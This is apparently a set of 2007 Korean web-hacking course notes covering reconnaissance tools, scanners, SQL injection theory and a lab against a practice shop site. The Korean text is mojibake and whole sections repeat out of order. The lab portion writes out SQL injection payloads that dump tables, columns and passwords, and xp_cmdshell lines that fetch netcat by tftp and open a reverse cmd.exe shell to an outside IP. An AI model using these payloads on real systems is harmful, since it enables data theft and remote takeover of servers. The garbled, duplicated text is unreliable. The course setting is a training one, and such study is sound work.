CSRF๋ฅผ ํตํด DMZ์์ญ์ ์ ์ํ ๊ด๋ฆฌ์์๊ฒ ๋ด๋ถ ZONE์ชฝ์ผ๋ก ๊ฐ์ REQEUST๋ฅผ ํ๋๋ก ์กฐ์ ๊ฐ๋ฅ
OWASPWASC
์์์
์น ์ดํ๋ฆฌ์ผ์ด์ ์ทจ์ฝ์ ๊ณต๊ฒฉ
์ํ๋์ ๋ฐ๋ผ ๊ณต๊ฒฉ
๊ฐ์ฉ์ฑ์ ๋จ์ดํธ๋ฆฌ๋ ๊ณต๊ฒฉ์ ์ธ
์๋ฒ์ shellํ๋ or๊ด๋ฆฌ์ ์ํธ ํ๋
๋ฐ์ดํฐ ์ด๋ ํ์ฉ๊ธ์ง
Ethical Hacking์ธ ๊ฒฝ์ฐ ๊ณ ๊ฐ์ ์๊ตฌ์ฌํญ ๋ฐ์
์คํ์ ๊ฑฐ
์น ์ทจ์ฝ์ ์ค์บ๋ ๊ฒฐ๊ณผ ๋ถ์
ONE WAY WEB HACKING ์ฝ์ด๋ณด๊ธฐ
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 14
SQL INJECTION
GETPOST ํ๋ผ๋ฏธํฐ HTTP REQUEST ํ๋ผ๋ฏธํฐ ์ฟ ํค ๊ฐ
๊ธฐํ ์๋ฒ์์ ์ฒ๋ฆฌํ๋ ๋ชจ๋ ํด๋ผ์ด์ถํธ ๊ฐ
ํด๋ผ์ด์ถํธ ์ ๋ ฅ ๊ฐ ์ ํ
ํด๋ผ์ด์ถํธ์์ ์ ๋ ฅ๋ ๊ฐ์ด ์ ํจ์ฑ ๊ฒ์ฆ๊ณผ์ ์์ด sql ๋ฌธ์ ํฌํจ๋๋ ๊ฒฝ์ฐ
MAIN CAUSE
Impact
์ธ์ฆ์ฐํ
๋ฐ์ดํฐ๋ฒ ์ด์ค ๋คํ ์กฐ์ ์์ฑ ํ๊ดด
DML D์ด ๋ฑ ์์ํ ์ ์๋ ๋ชจ๋ ์์
๋ฐ์ดํฐ๋ฒ ์ด์ค ์ปจํธ๋กค
์์คํ ๋ช ๋ น์ด ์คํ
COUNTERMEASURE
์ ๋ ฅ๊ฐ ๊ฒ์ฆ
์ต์๊ถํ ๋ถ์ฌ(SYSTEMDBMSDatabase)
์ธ์ฆ์ฐํ
์ธ๊ฐ๋ ์ฌ์ฉ์์ ID PW ๋ฅผ ์ ๋ ฅํ์ง ์๊ณ ๋ ์ธ์ฆ์ ์ฐํํ๋ ํ์
ID PW๋ฅผ ๋ชจ๋ฅด๋ ์ํ์์๋ ์ ์ ํ ๊ตฌ์ฑ๋ ๋ฌธ์์ด์ ์ ๋ ฅํ์ฌ ์ธ์ฆ์ ์ฐํํ๋ ๊ฒ์ด ๊ฐ๋ฅ
์ ๋ ฅ๋ ๋ฌธ์์ด์ SQL ๋ฌธ์ ์ผ๋ถ๋ก ์ฝ์ ์ด ๋์ด ์คํ๋จ
์ธ์ฆ ์ฐํ์ ์ฌ์ฉ๋๋ ์ ๋ ฅ๊ฐ์
๋ฌธ๋ฒ์ ์ค๋ฅ๋ฅผ ์ํค์ง ์์์ผ ํจ
WHERE์ ์ ์กฐ๊ฑด์ด ํญ์ ์ฐธ์ด ๋๋๋ก ์กฐ์
์น ์ ํ๋ฆฌ์ผ์ด์ ์ ์ผ๋ฐ์ ์ธ ์ธ์ฆ ์ ์ฐจ
1IDPW ์ ๋ ฅ
2SQL Query ์์ฑ
3DATABASE์ ์ฟผ๋ฆฌ ์ ์ก
4DATABASE์์ ์ฟผ๋ฆฌ๋ฌธ ์คํ
5๋ฐํ๋๋ RETURN๊ฐ์ ๋ฐ๋ผ ์ธ์ฆ์ฌ๋ถํ๋จ
SQL INJECTION ์ ์ฐจ
DB ์คํค๋งํ์ (DBTABLECOLUMN ํ๊ฒฝ์ ๋ณด๋ฑ ํ์
๋ฐ์ดํฐ๋ฒ ์ด์ค ์ด๋ฆ ํ์
ํ ์ด๋ธ์ด๋ฆ ํ์
์ปฌ๋ผ์ด๋ฆ ํ์
๋ชจ๋ SQL INJECTION์ ์ ๋ ฅ๊ฐ์ ๋ํ ์ ํจ์ฑ ๊ฒ์ฆ์ ํ์ง ์๊ธฐ ๋๋ฌธ์ ๋ฐ์ํ๋ค ์๋ฌ๋ฅผ ์ ๋ํ์ฌ ํ๋์ ์ ๋ณด๋ฅผ ๋์ถ์ํจ๋ค
DBMS ๊ฐ ์ ์ ํ ๊ถํ์ ๊ฐ์ง๊ณ ์๋ ๊ฒฝ์ฐ ๋ ์ง์คํธ๋ฆฌ์ ์ ๊ทบํ๋ ๊ฒ์ด ๊ฐ๋ฅ
DBMS๊ฐ ์ ์ ํ ๊ถํ์ ๊ฐ์ง๊ณ ์๋ ๊ฒฝ์ฐ ์ฟผ๋ฆฌ๋ฅผ ํตํ ์๋น์ค ์ ์ด๊ฐ ๊ฐ๋ฅ
OYES MALL (SQL INJECTION์ ์ด์ฉํ ๊ด๋ฆฌ์ ๊ถํ ํ๋ ์ค์ต
ํ๊ฒฝ์(2000ASPMS-SQL2000)
์ค๋น๋ ์ผํ๋ชฐ์ด๋ค
์ฒซ๋ฒ์งธ ๋ฐฉ๋ฒ
Web Hacking 3์ผ์ฐจ
2007๋ 10์ 25์ผ ๋ชฉ์์ผ
์ค์ 1200
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 15
group by(user_id) -- ๋ฅผ ์ด์ฉํด ํ ์ด๋ธ์ ์์๋ธ๋ค
Member ํ ์ด๋ธ์์์๋ num์ด๋ผ๋ ์ปฌ๋ผ์ ํ ํด๋๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 16
union select from members where user_id like o ํด๋ด๋ผ ๋ก๊ทธ์ธ ๋ ๊ฑฐ๋ค
๋๋ฒ์งธ ๋ฐฉ๋ฒ
์ฃผ์๋ก์กฐํ ๋ถ๋ถ์ SQL INJECTION์ ํ์๋ค
$UNION SELECT 1234TABLE_NAME FROM INFORMATION_SCHEMATABLES-- ์๊ฐ์ด ์ง์๋ฅผ ํ๋ฉด ํ ํด๋ธ๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 17
์ฐ๋ฆฌ๋ members ๋ผ๋ ํ ์ด๋ธ์ด ์กด์ฌํ๋ ๊ฒ์ ๋ณผ์ ์์ ๊ฒ์ด๋ค
$UNION SELECT 1234 COLUMN_NAME FROM INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME= members --
Members์ ๋ํ ์ปฌ๋ผ์ ํ ํด๋ธ๋ค
$ or 1=(select top 1 user_id from members)--
User id์ ์ปฌ๋ผ์ top 1 ์ธ๊ฒ์ ํ ํด๋ธ๋ค
union select 1234 user_idpasswd from members where user_id=oyes --
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 18
์ผ์~password ๊ฐ oyesmall ์ด๋ผ๋ค ์ค์ต ๋
File Uploading
$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc2000exe --
$$ exec masterxp_cmdshell nc1000exe 2112406877 7777 -e cmdexe --
์์ฃผ ๊ฐ๋จํ๋ค
$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc6249exe ampamp nc -e cmdexe 2112406877 6249 --
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 19
AFD(Acitive Filter Detection)
ICMP TTL๊ฐ์ ์กฐ์ ํด๊ฐ๋ฉฐ ์น ์๋ฒ ํ์ง
netcraftcom
Stealth Scan-sS
Normal Scan-sT-sU
Network Services Version Scan-sV
OSDetection-O-A
DoNotPing_P0
Idle scan
IDS์ฐํ
httpunicornscanorg
Unicorn scan -mT -p -v -r 2501921681024q
Unicornscan
Nc
jikto
Port Scan(Port Mapping)
httTrack
Web Site Mirroring
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 11
-grepegrep awksedsortuniq(moreheadless)๋ฑ ํ์ฉ
Mirroring ํ ์ ์ ๋ถ์
balckwindow
InteliTamper
Wikto
Web๊ตฌ์กฐ ๋ถ์(๋ฐ์๋)
Httpwatch
TamperlE
Cooxie
LiveHttpHeaders(firefox)
Command line tool(nccurlopenssl)
Manual Analysis
ParosWebscrabFidderBurpIntruder
SoftwareProxy
Web๊ตฌ์กฐ๋ถ์(์์์ )
๊ด๋ฆฌ์ํ์ด์ง
์๋ฃ์ค(web shell)
ํต๊ณ ์ํ ํ์ด์ง
ํ์๋ฑ๋ก์ฐํธ๋ฒํธ ์กฐํ(์ธ์ ์ ๊ณต๊ฒฉ)
(์ธ์ ์ ์ ์ ๋ ฅ๊ฐ์ ๋ฃ์์๋ ๊ฒฐ๊ณผ๋ฅผ ๋ฟ๋ ค์ฃผ๋ ํ์ด์ง๋ฅผ ์ฐพ์์ผํ๋ค)์๋ณด์ฌ์ฃผ๋๊ฑด ๋ธ๋ผ์ธ๋ ์ธ์ ์
์ํธ๋ถ์ค(์ํธ ํ๋ ์์)
์ ๋ณด์์ (์ํ์์ง์์น๊ธฐํ)
ํ์๊ฐ์ ํ์ด์ง
๊ฒฐ์ ํ์ด์ง
Basic Banner Garbbing
Http resonse ํค๋ ์์
Http resonse ํค๋ ์กด์ฌ ์ ๋ฌด
Http resonse ํค๋์ ํน์ ๊ฐ
Tracehead ๋ฑ์ ๋ํ ์์ดํ ์๋ต
๋ฐ์ดํฐ์์ด ์ ์กํ put์ ๋ํ์๋ต
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 12
Tracehead ๋ฑ์ ๋ํ ์์ดํ ์๋ต
๋ฐ์ดํฐ์์ด ์ ์กํ put์ ๋ํ์๋ต
Unexpercted Method ์ ์ก
๋์ผ์์ฒญ ๋ฐ๋ณต ์ ์ก
์ทจ์ฝ์ ์ค์บ(system)
Xscan
Nessus
n-stealth security scanner
์ทจ์ฝ์ ์ค์บ(Web Server amp WAS amp Web App)
APP SCANNER
ACUNETIX
NSTALKER SCANNER
์ค์บ ISSUE
BASIC DIGEST NTML CERT
FORM-BASED
์ธ์ฆ์ ๋ณด ์ค์
์ค์บ ๊ฐ๋(๋ฉํฐ ์ปค๋ฅ์ ํ์์์ ๊ณต๊ฒฉ๋ชจ๋๋น๊ณต๊ฒฉ๋ชจ๋)
๋ถ์
์๋ฏธ์๋ ์ ๋ณด๋ก ๊ฐ๊ณต
ACCOUNT ์์ง
OS์ ๋ณด์ ๋ฐ๋ฅธ ์ทจ์ฝ์ ์์ง
ํฌํธ๋ณ ์๋น์ค ์ทจ์ฝ์
์น์๋ฒ ์ ์ฒด๊ตฌ์กฐ ๋ถ์
์ฃผ์
ํ๋ ํ๋
์์ค๋ถ์
์ฟ ํค๋ถ์
์ธ์ ID์์ฑ ์ทจ์ฝ์ ๋ถ์
๊ณต๊ฒฉ
์ ๋ณด์ ๊ทบ๊ฑฐํ ๊ณต๊ฒฉ
๋ฌด์์ ๊ณต๊ฒฉ
์ฌ์ ๊ณต๊ฒฉ
๊ณต๊ฒฉ์ด์
์์ง๋ ACCOUNT ์ ๋ณด๋ฅผ์ด์ฉ
OSNETWORK SERVICE ๊ณต๊ฒฉ
WEBSERVER WEBAPP SERVER WEBAPPLICATION
SQLISCANNER
๊ถํ ์์น
์ํ
ํ์์ ๋ณด ์์
Cookie Stealing
CSRF
์์ง
CSRF
CSRF๋ฅผ ํตํด DMZ์์ญ์ ์ ์ํ ๊ด๋ฆฌ์์๊ฒ ๋ด๋ถ ZONE์ชฝ์ผ๋ก ๊ฐ์ REQEUST๋ฅผ ํ๋๋ก ์กฐ์ ๊ฐ๋ฅ
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 13
์ ์ ์กฐ๊ฑด์ ๋ด๋ถ๋ง์ IP APPLICATION PARAMETERS ๋ฅผ ๋ชจ๋ ์๊ณ ์์ ๊ฒฝ์ฐ
CSRF๋ฅผ ํตํด DMZ์์ญ์ ์ ์ํ ๊ด๋ฆฌ์์๊ฒ ๋ด๋ถ ZONE์ชฝ์ผ๋ก ๊ฐ์ REQEUST๋ฅผ ํ๋๋ก ์กฐ์ ๊ฐ๋ฅ
OWASPWASC
์์์
์น ์ดํ๋ฆฌ์ผ์ด์ ์ทจ์ฝ์ ๊ณต๊ฒฉ
์ํ๋์ ๋ฐ๋ผ ๊ณต๊ฒฉ
๊ฐ์ฉ์ฑ์ ๋จ์ดํธ๋ฆฌ๋ ๊ณต๊ฒฉ์ ์ธ
์๋ฒ์ shellํ๋ or๊ด๋ฆฌ์ ์ํธ ํ๋
๋ฐ์ดํฐ ์ด๋ ํ์ฉ๊ธ์ง
Ethical Hacking์ธ ๊ฒฝ์ฐ ๊ณ ๊ฐ์ ์๊ตฌ์ฌํญ ๋ฐ์
์คํ์ ๊ฑฐ
์น ์ทจ์ฝ์ ์ค์บ๋ ๊ฒฐ๊ณผ ๋ถ์
ONE WAY WEB HACKING ์ฝ์ด๋ณด๊ธฐ
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 14
SQL INJECTION
GETPOST ํ๋ผ๋ฏธํฐ HTTP REQUEST ํ๋ผ๋ฏธํฐ ์ฟ ํค ๊ฐ
๊ธฐํ ์๋ฒ์์ ์ฒ๋ฆฌํ๋ ๋ชจ๋ ํด๋ผ์ด์ถํธ ๊ฐ
ํด๋ผ์ด์ถํธ ์ ๋ ฅ ๊ฐ ์ ํ
ํด๋ผ์ด์ถํธ์์ ์ ๋ ฅ๋ ๊ฐ์ด ์ ํจ์ฑ ๊ฒ์ฆ๊ณผ์ ์์ด sql ๋ฌธ์ ํฌํจ๋๋ ๊ฒฝ์ฐ
MAIN CAUSE
Impact
์ธ์ฆ์ฐํ
๋ฐ์ดํฐ๋ฒ ์ด์ค ๋คํ ์กฐ์ ์์ฑ ํ๊ดด
DML D์ด ๋ฑ ์์ํ ์ ์๋ ๋ชจ๋ ์์
๋ฐ์ดํฐ๋ฒ ์ด์ค ์ปจํธ๋กค
์์คํ ๋ช ๋ น์ด ์คํ
COUNTERMEASURE
์ ๋ ฅ๊ฐ ๊ฒ์ฆ
์ต์๊ถํ ๋ถ์ฌ(SYSTEMDBMSDatabase)
์ธ์ฆ์ฐํ
์ธ๊ฐ๋ ์ฌ์ฉ์์ ID PW ๋ฅผ ์ ๋ ฅํ์ง ์๊ณ ๋ ์ธ์ฆ์ ์ฐํํ๋ ํ์
ID PW๋ฅผ ๋ชจ๋ฅด๋ ์ํ์์๋ ์ ์ ํ ๊ตฌ์ฑ๋ ๋ฌธ์์ด์ ์ ๋ ฅํ์ฌ ์ธ์ฆ์ ์ฐํํ๋ ๊ฒ์ด ๊ฐ๋ฅ
์ ๋ ฅ๋ ๋ฌธ์์ด์ SQL ๋ฌธ์ ์ผ๋ถ๋ก ์ฝ์ ์ด ๋์ด ์คํ๋จ
์ธ์ฆ ์ฐํ์ ์ฌ์ฉ๋๋ ์ ๋ ฅ๊ฐ์
๋ฌธ๋ฒ์ ์ค๋ฅ๋ฅผ ์ํค์ง ์์์ผ ํจ
WHERE์ ์ ์กฐ๊ฑด์ด ํญ์ ์ฐธ์ด ๋๋๋ก ์กฐ์
์น ์ ํ๋ฆฌ์ผ์ด์ ์ ์ผ๋ฐ์ ์ธ ์ธ์ฆ ์ ์ฐจ
1IDPW ์ ๋ ฅ
2SQL Query ์์ฑ
3DATABASE์ ์ฟผ๋ฆฌ ์ ์ก
4DATABASE์์ ์ฟผ๋ฆฌ๋ฌธ ์คํ
5๋ฐํ๋๋ RETURN๊ฐ์ ๋ฐ๋ผ ์ธ์ฆ์ฌ๋ถํ๋จ
SQL INJECTION ์ ์ฐจ
DB ์คํค๋งํ์ (DBTABLECOLUMN ํ๊ฒฝ์ ๋ณด๋ฑ ํ์
๋ฐ์ดํฐ๋ฒ ์ด์ค ์ด๋ฆ ํ์
ํ ์ด๋ธ์ด๋ฆ ํ์
์ปฌ๋ผ์ด๋ฆ ํ์
๋ชจ๋ SQL INJECTION์ ์ ๋ ฅ๊ฐ์ ๋ํ ์ ํจ์ฑ ๊ฒ์ฆ์ ํ์ง ์๊ธฐ ๋๋ฌธ์ ๋ฐ์ํ๋ค ์๋ฌ๋ฅผ ์ ๋ํ์ฌ ํ๋์ ์ ๋ณด๋ฅผ ๋์ถ์ํจ๋ค
DBMS ๊ฐ ์ ์ ํ ๊ถํ์ ๊ฐ์ง๊ณ ์๋ ๊ฒฝ์ฐ ๋ ์ง์คํธ๋ฆฌ์ ์ ๊ทบํ๋ ๊ฒ์ด ๊ฐ๋ฅ
DBMS๊ฐ ์ ์ ํ ๊ถํ์ ๊ฐ์ง๊ณ ์๋ ๊ฒฝ์ฐ ์ฟผ๋ฆฌ๋ฅผ ํตํ ์๋น์ค ์ ์ด๊ฐ ๊ฐ๋ฅ
OYES MALL (SQL INJECTION์ ์ด์ฉํ ๊ด๋ฆฌ์ ๊ถํ ํ๋ ์ค์ต
ํ๊ฒฝ์(2000ASPMS-SQL2000)
์ค๋น๋ ์ผํ๋ชฐ์ด๋ค
์ฒซ๋ฒ์งธ ๋ฐฉ๋ฒ
Web Hacking 3์ผ์ฐจ
2007๋ 10์ 25์ผ ๋ชฉ์์ผ
์ค์ 1200
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 15
group by(user_id) -- ๋ฅผ ์ด์ฉํด ํ ์ด๋ธ์ ์์๋ธ๋ค
Member ํ ์ด๋ธ์์์๋ num์ด๋ผ๋ ์ปฌ๋ผ์ ํ ํด๋๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 16
union select from members where user_id like o ํด๋ด๋ผ ๋ก๊ทธ์ธ ๋ ๊ฑฐ๋ค
๋๋ฒ์งธ ๋ฐฉ๋ฒ
์ฃผ์๋ก์กฐํ ๋ถ๋ถ์ SQL INJECTION์ ํ์๋ค
$UNION SELECT 1234TABLE_NAME FROM INFORMATION_SCHEMATABLES-- ์๊ฐ์ด ์ง์๋ฅผ ํ๋ฉด ํ ํด๋ธ๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 17
์ฐ๋ฆฌ๋ members ๋ผ๋ ํ ์ด๋ธ์ด ์กด์ฌํ๋ ๊ฒ์ ๋ณผ์ ์์ ๊ฒ์ด๋ค
$UNION SELECT 1234 COLUMN_NAME FROM INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME= members --
Members์ ๋ํ ์ปฌ๋ผ์ ํ ํด๋ธ๋ค
$ or 1=(select top 1 user_id from members)--
User id์ ์ปฌ๋ผ์ top 1 ์ธ๊ฒ์ ํ ํด๋ธ๋ค
union select 1234 user_idpasswd from members where user_id=oyes --
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 18
์ผ์~password ๊ฐ oyesmall ์ด๋ผ๋ค ์ค์ต ๋
File Uploading
$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc2000exe --
$$ exec masterxp_cmdshell nc1000exe 2112406877 7777 -e cmdexe --
์์ฃผ ๊ฐ๋จํ๋ค
$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc6249exe ampamp nc -e cmdexe 2112406877 6249 --
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 19
-grepegrep awksedsortuniq(moreheadless)๋ฑ ํ์ฉ
Mirroring ํ ์ ์ ๋ถ์
balckwindow
InteliTamper
Wikto
Web๊ตฌ์กฐ ๋ถ์(๋ฐ์๋)
Httpwatch
TamperlE
Cooxie
LiveHttpHeaders(firefox)
Command line tool(nccurlopenssl)
Manual Analysis
ParosWebscrabFidderBurpIntruder
SoftwareProxy
Web๊ตฌ์กฐ๋ถ์(์์์ )
๊ด๋ฆฌ์ํ์ด์ง
์๋ฃ์ค(web shell)
ํต๊ณ ์ํ ํ์ด์ง
ํ์๋ฑ๋ก์ฐํธ๋ฒํธ ์กฐํ(์ธ์ ์ ๊ณต๊ฒฉ)
(์ธ์ ์ ์ ์ ๋ ฅ๊ฐ์ ๋ฃ์์๋ ๊ฒฐ๊ณผ๋ฅผ ๋ฟ๋ ค์ฃผ๋ ํ์ด์ง๋ฅผ ์ฐพ์์ผํ๋ค)์๋ณด์ฌ์ฃผ๋๊ฑด ๋ธ๋ผ์ธ๋ ์ธ์ ์
์ํธ๋ถ์ค(์ํธ ํ๋ ์์)
์ ๋ณด์์ (์ํ์์ง์์น๊ธฐํ)
ํ์๊ฐ์ ํ์ด์ง
๊ฒฐ์ ํ์ด์ง
Basic Banner Garbbing
Http resonse ํค๋ ์์
Http resonse ํค๋ ์กด์ฌ ์ ๋ฌด
Http resonse ํค๋์ ํน์ ๊ฐ
Tracehead ๋ฑ์ ๋ํ ์์ดํ ์๋ต
๋ฐ์ดํฐ์์ด ์ ์กํ put์ ๋ํ์๋ต
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 12
Tracehead ๋ฑ์ ๋ํ ์์ดํ ์๋ต
๋ฐ์ดํฐ์์ด ์ ์กํ put์ ๋ํ์๋ต
Unexpercted Method ์ ์ก
๋์ผ์์ฒญ ๋ฐ๋ณต ์ ์ก
์ทจ์ฝ์ ์ค์บ(system)
Xscan
Nessus
n-stealth security scanner
์ทจ์ฝ์ ์ค์บ(Web Server amp WAS amp Web App)
APP SCANNER
ACUNETIX
NSTALKER SCANNER
์ค์บ ISSUE
BASIC DIGEST NTML CERT
FORM-BASED
์ธ์ฆ์ ๋ณด ์ค์
์ค์บ ๊ฐ๋(๋ฉํฐ ์ปค๋ฅ์ ํ์์์ ๊ณต๊ฒฉ๋ชจ๋๋น๊ณต๊ฒฉ๋ชจ๋)
๋ถ์
์๋ฏธ์๋ ์ ๋ณด๋ก ๊ฐ๊ณต
ACCOUNT ์์ง
OS์ ๋ณด์ ๋ฐ๋ฅธ ์ทจ์ฝ์ ์์ง
ํฌํธ๋ณ ์๋น์ค ์ทจ์ฝ์
์น์๋ฒ ์ ์ฒด๊ตฌ์กฐ ๋ถ์
์ฃผ์
ํ๋ ํ๋
์์ค๋ถ์
์ฟ ํค๋ถ์
์ธ์ ID์์ฑ ์ทจ์ฝ์ ๋ถ์
๊ณต๊ฒฉ
์ ๋ณด์ ๊ทบ๊ฑฐํ ๊ณต๊ฒฉ
๋ฌด์์ ๊ณต๊ฒฉ
์ฌ์ ๊ณต๊ฒฉ
๊ณต๊ฒฉ์ด์
์์ง๋ ACCOUNT ์ ๋ณด๋ฅผ์ด์ฉ
OSNETWORK SERVICE ๊ณต๊ฒฉ
WEBSERVER WEBAPP SERVER WEBAPPLICATION
SQLISCANNER
๊ถํ ์์น
์ํ
ํ์์ ๋ณด ์์
Cookie Stealing
CSRF
์์ง
CSRF
CSRF๋ฅผ ํตํด DMZ์์ญ์ ์ ์ํ ๊ด๋ฆฌ์์๊ฒ ๋ด๋ถ ZONE์ชฝ์ผ๋ก ๊ฐ์ REQEUST๋ฅผ ํ๋๋ก ์กฐ์ ๊ฐ๋ฅ
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 13
์ ์ ์กฐ๊ฑด์ ๋ด๋ถ๋ง์ IP APPLICATION PARAMETERS ๋ฅผ ๋ชจ๋ ์๊ณ ์์ ๊ฒฝ์ฐ
CSRF๋ฅผ ํตํด DMZ์์ญ์ ์ ์ํ ๊ด๋ฆฌ์์๊ฒ ๋ด๋ถ ZONE์ชฝ์ผ๋ก ๊ฐ์ REQEUST๋ฅผ ํ๋๋ก ์กฐ์ ๊ฐ๋ฅ
OWASPWASC
์์์
์น ์ดํ๋ฆฌ์ผ์ด์ ์ทจ์ฝ์ ๊ณต๊ฒฉ
์ํ๋์ ๋ฐ๋ผ ๊ณต๊ฒฉ
๊ฐ์ฉ์ฑ์ ๋จ์ดํธ๋ฆฌ๋ ๊ณต๊ฒฉ์ ์ธ
์๋ฒ์ shellํ๋ or๊ด๋ฆฌ์ ์ํธ ํ๋
๋ฐ์ดํฐ ์ด๋ ํ์ฉ๊ธ์ง
Ethical Hacking์ธ ๊ฒฝ์ฐ ๊ณ ๊ฐ์ ์๊ตฌ์ฌํญ ๋ฐ์
์คํ์ ๊ฑฐ
์น ์ทจ์ฝ์ ์ค์บ๋ ๊ฒฐ๊ณผ ๋ถ์
ONE WAY WEB HACKING ์ฝ์ด๋ณด๊ธฐ
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 14
SQL INJECTION
GETPOST ํ๋ผ๋ฏธํฐ HTTP REQUEST ํ๋ผ๋ฏธํฐ ์ฟ ํค ๊ฐ
๊ธฐํ ์๋ฒ์์ ์ฒ๋ฆฌํ๋ ๋ชจ๋ ํด๋ผ์ด์ถํธ ๊ฐ
ํด๋ผ์ด์ถํธ ์ ๋ ฅ ๊ฐ ์ ํ
ํด๋ผ์ด์ถํธ์์ ์ ๋ ฅ๋ ๊ฐ์ด ์ ํจ์ฑ ๊ฒ์ฆ๊ณผ์ ์์ด sql ๋ฌธ์ ํฌํจ๋๋ ๊ฒฝ์ฐ
MAIN CAUSE
Impact
์ธ์ฆ์ฐํ
๋ฐ์ดํฐ๋ฒ ์ด์ค ๋คํ ์กฐ์ ์์ฑ ํ๊ดด
DML D์ด ๋ฑ ์์ํ ์ ์๋ ๋ชจ๋ ์์
๋ฐ์ดํฐ๋ฒ ์ด์ค ์ปจํธ๋กค
์์คํ ๋ช ๋ น์ด ์คํ
COUNTERMEASURE
์ ๋ ฅ๊ฐ ๊ฒ์ฆ
์ต์๊ถํ ๋ถ์ฌ(SYSTEMDBMSDatabase)
์ธ์ฆ์ฐํ
์ธ๊ฐ๋ ์ฌ์ฉ์์ ID PW ๋ฅผ ์ ๋ ฅํ์ง ์๊ณ ๋ ์ธ์ฆ์ ์ฐํํ๋ ํ์
ID PW๋ฅผ ๋ชจ๋ฅด๋ ์ํ์์๋ ์ ์ ํ ๊ตฌ์ฑ๋ ๋ฌธ์์ด์ ์ ๋ ฅํ์ฌ ์ธ์ฆ์ ์ฐํํ๋ ๊ฒ์ด ๊ฐ๋ฅ
์ ๋ ฅ๋ ๋ฌธ์์ด์ SQL ๋ฌธ์ ์ผ๋ถ๋ก ์ฝ์ ์ด ๋์ด ์คํ๋จ
์ธ์ฆ ์ฐํ์ ์ฌ์ฉ๋๋ ์ ๋ ฅ๊ฐ์
๋ฌธ๋ฒ์ ์ค๋ฅ๋ฅผ ์ํค์ง ์์์ผ ํจ
WHERE์ ์ ์กฐ๊ฑด์ด ํญ์ ์ฐธ์ด ๋๋๋ก ์กฐ์
์น ์ ํ๋ฆฌ์ผ์ด์ ์ ์ผ๋ฐ์ ์ธ ์ธ์ฆ ์ ์ฐจ
1IDPW ์ ๋ ฅ
2SQL Query ์์ฑ
3DATABASE์ ์ฟผ๋ฆฌ ์ ์ก
4DATABASE์์ ์ฟผ๋ฆฌ๋ฌธ ์คํ
5๋ฐํ๋๋ RETURN๊ฐ์ ๋ฐ๋ผ ์ธ์ฆ์ฌ๋ถํ๋จ
SQL INJECTION ์ ์ฐจ
DB ์คํค๋งํ์ (DBTABLECOLUMN ํ๊ฒฝ์ ๋ณด๋ฑ ํ์
๋ฐ์ดํฐ๋ฒ ์ด์ค ์ด๋ฆ ํ์
ํ ์ด๋ธ์ด๋ฆ ํ์
์ปฌ๋ผ์ด๋ฆ ํ์
๋ชจ๋ SQL INJECTION์ ์ ๋ ฅ๊ฐ์ ๋ํ ์ ํจ์ฑ ๊ฒ์ฆ์ ํ์ง ์๊ธฐ ๋๋ฌธ์ ๋ฐ์ํ๋ค ์๋ฌ๋ฅผ ์ ๋ํ์ฌ ํ๋์ ์ ๋ณด๋ฅผ ๋์ถ์ํจ๋ค
DBMS ๊ฐ ์ ์ ํ ๊ถํ์ ๊ฐ์ง๊ณ ์๋ ๊ฒฝ์ฐ ๋ ์ง์คํธ๋ฆฌ์ ์ ๊ทบํ๋ ๊ฒ์ด ๊ฐ๋ฅ
DBMS๊ฐ ์ ์ ํ ๊ถํ์ ๊ฐ์ง๊ณ ์๋ ๊ฒฝ์ฐ ์ฟผ๋ฆฌ๋ฅผ ํตํ ์๋น์ค ์ ์ด๊ฐ ๊ฐ๋ฅ
OYES MALL (SQL INJECTION์ ์ด์ฉํ ๊ด๋ฆฌ์ ๊ถํ ํ๋ ์ค์ต
ํ๊ฒฝ์(2000ASPMS-SQL2000)
์ค๋น๋ ์ผํ๋ชฐ์ด๋ค
์ฒซ๋ฒ์งธ ๋ฐฉ๋ฒ
Web Hacking 3์ผ์ฐจ
2007๋ 10์ 25์ผ ๋ชฉ์์ผ
์ค์ 1200
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 15
group by(user_id) -- ๋ฅผ ์ด์ฉํด ํ ์ด๋ธ์ ์์๋ธ๋ค
Member ํ ์ด๋ธ์์์๋ num์ด๋ผ๋ ์ปฌ๋ผ์ ํ ํด๋๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 16
union select from members where user_id like o ํด๋ด๋ผ ๋ก๊ทธ์ธ ๋ ๊ฑฐ๋ค
๋๋ฒ์งธ ๋ฐฉ๋ฒ
์ฃผ์๋ก์กฐํ ๋ถ๋ถ์ SQL INJECTION์ ํ์๋ค
$UNION SELECT 1234TABLE_NAME FROM INFORMATION_SCHEMATABLES-- ์๊ฐ์ด ์ง์๋ฅผ ํ๋ฉด ํ ํด๋ธ๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 17
์ฐ๋ฆฌ๋ members ๋ผ๋ ํ ์ด๋ธ์ด ์กด์ฌํ๋ ๊ฒ์ ๋ณผ์ ์์ ๊ฒ์ด๋ค
$UNION SELECT 1234 COLUMN_NAME FROM INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME= members --
